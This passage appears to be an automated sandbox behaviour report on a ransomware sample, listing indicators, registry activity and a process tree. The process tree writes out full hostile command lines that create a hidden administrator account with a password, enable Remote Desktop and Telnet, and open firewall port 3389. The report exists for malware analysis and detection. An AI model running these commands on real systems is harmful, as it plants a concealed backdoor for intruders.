  modified  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  created   C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js.id-2DAA3087.[[email protected]].ROGER
  modified  C:\Program Files\Java\jdk-1.8\legal\javafx\libxml2.md.id-2DAA3087.[[email protected]].ROGER
Drops file in Windows directory (1 IoC)
  File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  mspaint.exe
  This is the Windows Image Acquisition trace log that Paint writes; it fits the submitted .jpg being opened in mspaint.exe and is not sample activity.

Launches sc.exe (1 IoC)
  sc.exe is the Windows utility for creating, configuring, starting and stopping services.
  pid   Process
  5060  sc.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)
  netsh.exe (Netshell) is the command-line utility for changing a system's network configuration. On start it loads the helper DLLs registered under HKLM\SOFTWARE\Microsoft\NetSh, which is why that key is both a persistence target and something every netsh invocation reads.
  Key opened            \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
  All three events are reads. They are what the firewall change under "Modifies Windows Firewall" (also netsh.exe) produces on start-up and do not by themselves show that a helper DLL was registered; a write to this key would.

Permission Groups Discovery: Local Groups (1 TTP)
  Attempts to find local system groups and permission settings.
System Location Discovery: System Language Discovery (1 TTP, 33 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by process (event count):
    cmd.exe (6), net.exe (5), net1.exe (5), reg.exe (3), WMIC.exe (2), find.exe (2); once each: 1sass.exe, attrib.exe, Dharma.exe, Fantom.exe, GandCrab.exe, mssql2.exe, nc123.exe, netsh.exe, sc.exe, SearchHost.exe
  This key is read by nearly every process that initialises locale data, including the built-in tools listed, so on its own it carries little weight; its value here is as a roll-call of the processes the chain spawned.
Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
  SCSI information is often read in order to detect sandboxing environments. All six reads here are by taskmgr.exe, which shows disk model names on its Performance tab, so this is most likely Task Manager's own behaviour rather than the sample probing the environment.
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName  taskmgr.exe  (2x)
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000  taskmgr.exe  (2x)
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe  (2x)

Checks processor information in registry (2 TTPs, 5 IoCs)
  Processor information is often read in order to detect sandboxing environments. GandCrab.exe reads both the name string and the Identifier; the taskmgr.exe reads are Task Manager populating its CPU panel.
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  GandCrab.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  GandCrab.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  GandCrab.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  taskmgr.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
  All three reads are by the browser, not by a dropped executable.
Interacts with shadow copies (3 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid   Process
  7332  vssadmin.exe

(signature name not captured on the page)
  Key created  \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000\Software\Microsoft\Internet Explorer\TypedURLs  taskmgr.exe

Modifies registry class (1 IoC)
  Key created  \REGISTRY\USER\S-1-5-21-2839013668-2276131261-2828740280-1000_Classes\Local Settings  taskmgr.exe

NTFS ADS (3 IoCs)
  File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 864553.crdownload:SmartScreen  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 721579.crdownload:SmartScreen  msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 855476.crdownload:SmartScreen  msedge.exe
  Edge writes a SmartScreen alternate data stream to its own in-progress downloads; these entries belong to the browser downloads made during the run, not to the ransomware.

Runs net.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1788 mspaint.exe 1788 mspaint.exe 2268 msedge.exe 2268 msedge.exe 3132 msedge.exe 3132 msedge.exe 4304 identity_helper.exe 4304 identity_helper.exe 4236 msedge.exe 4236 msedge.exe 4860 WMIC.exe 4860 WMIC.exe 4860 WMIC.exe 4860 WMIC.exe 3756 WMIC.exe 3756 WMIC.exe 3756 WMIC.exe 3756 WMIC.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1820 taskmgr.exe -
Suspicious behavior: LoadsDriver 32 IoCs
pid Process 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 64 IoCs
Suspicious use of SetWindowsHookEx 9 IoCs
pid   Process
1788  mspaint.exe
1788  mspaint.exe
1788  mspaint.exe
1788  mspaint.exe
2232  mssql.exe
4236  mssql2.exe
3524  SearchHost.exe
2232  mssql.exe
3132  msedge.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid   Process
4860  attrib.exe
Processes
-
C:\Windows\system32\mspaint.exe
  Command line: "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\b231263f-0b92-4f02-9e71-3d6a05534490.jpg"
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID: 1788
-
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
  PID: 2224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 3132
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7fff903646f8,0x7fff90364708,0x7fff90364718
    PID: 4024
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
    PID: 1068
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    PID: 2268
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
    PID: 544
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
    PID: 4464
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
    PID: 1688
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
    PID: 1120
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
    PID: 4544
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:8
    PID: 2344
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 4304
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
    PID: 3852
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
    PID: 868
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
    PID: 4656
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
    PID: 3288
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
    PID: 4900
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
    PID: 4752
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
    PID: 4464
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
    PID: 744
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
    PID: 1904
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6108 /prefetch:8
    PID: 1460
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
    PID: 2276
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
    PID: 4916
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4228 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 4236
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6628 /prefetch:8
    PID: 4576
  C:\Users\Admin\Downloads\Dharma.exe
    Command line: "C:\Users\Admin\Downloads\Dharma.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID: 464
    C:\Users\Admin\Downloads\ac\nc123.exe
      Command line: "C:\Users\Admin\Downloads\ac\nc123.exe"
      - Executes dropped EXE
      - Enumerates connected drives
      - System Location Discovery: System Language Discovery
      PID: 1648
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c cls
        - System Location Discovery: System Language Discovery
        PID: 2060
    C:\Users\Admin\Downloads\ac\mssql.exe
      Command line: "C:\Users\Admin\Downloads\ac\mssql.exe"
      - Sets service image path in registry
      - Executes dropped EXE
      - Impair Defenses: Safe Mode Boot
      - Suspicious behavior: LoadsDriver
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      PID: 2232
    C:\Users\Admin\Downloads\ac\mssql2.exe
      Command line: "C:\Users\Admin\Downloads\ac\mssql2.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      PID: 4236
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
      - System Location Discovery: System Language Discovery
      PID: 216
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
      - System Location Discovery: System Language Discovery
      PID: 5044
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
        - System Location Discovery: System Language Discovery
        PID: 3480
        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 4860
        C:\Windows\SysWOW64\find.exe
          Command line: Find "="
          - System Location Discovery: System Language Discovery
          PID: 5068
      C:\Windows\SysWOW64\net.exe
        Command line: net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        - System Location Discovery: System Language Discovery
        PID: 3340
        C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
          - System Location Discovery: System Language Discovery
          PID: 3276
      C:\Windows\SysWOW64\net.exe
        Command line: net localgroup Administrators systembackup /add
        - System Location Discovery: System Language Discovery
        PID: 464
        C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 localgroup Administrators systembackup /add
          - System Location Discovery: System Language Discovery
          PID: 4080
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
        - System Location Discovery: System Language Discovery
        PID: 4044
        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          PID: 3756
        C:\Windows\SysWOW64\find.exe
          Command line: Find "="
          - System Location Discovery: System Language Discovery
          PID: 1112
      C:\Windows\SysWOW64\net.exe
        Command line: net localgroup "Remote Desktop Users" systembackup /add
        - Remote Service Session Hijacking: RDP Hijacking
        - System Location Discovery: System Language Discovery
        PID: 3792
        C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
          - Remote Service Session Hijacking: RDP Hijacking
          - System Location Discovery: System Language Discovery
          PID: 2824
      C:\Windows\SysWOW64\net.exe
        Command line: net accounts /forcelogoff:no /maxpwage:unlimited
        - System Location Discovery: System Language Discovery
        PID: 2060
        C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
          - System Location Discovery: System Language Discovery
          PID: 1668
      C:\Windows\SysWOW64\reg.exe
        Command line: reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
        - System Location Discovery: System Language Discovery
        PID: 4316
      C:\Windows\SysWOW64\reg.exe
        Command line: reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
        - System Location Discovery: System Language Discovery
        PID: 3212
      C:\Windows\SysWOW64\reg.exe
        Command line: reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
        - Hide Artifacts: Hidden Users
        - System Location Discovery: System Language Discovery
        PID: 4184
      C:\Windows\SysWOW64\attrib.exe
        Command line: attrib C:\users\systembackup +r +a +s +h
        - Sets file to hidden
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
        PID: 4860
      C:\Windows\SysWOW64\netsh.exe
        Command line: netsh firewall add portopening TCP 3389 "Remote Desktop"
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL
        - System Location Discovery: System Language Discovery
        PID: 1280
      C:\Windows\SysWOW64\sc.exe
        Command line: sc config tlntsvr start=auto
        - Launches sc.exe
        - System Location Discovery: System Language Discovery
        PID: 5060
      C:\Windows\SysWOW64\net.exe
        Command line: net start Telnet
        - System Location Discovery: System Language Discovery
        PID: 2748
        C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 start Telnet
          - System Location Discovery: System Language Discovery
          PID: 696
    C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
      Command line: "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
      - Executes dropped EXE
      - Enumerates connected drives
      - System Location Discovery: System Language Discovery
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
      PID: 3524
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5700 /prefetch:2
    PID: 8776
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
    PID: 5740
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 /prefetch:8
    PID: 7480
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6752 /prefetch:8
    PID: 5836
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
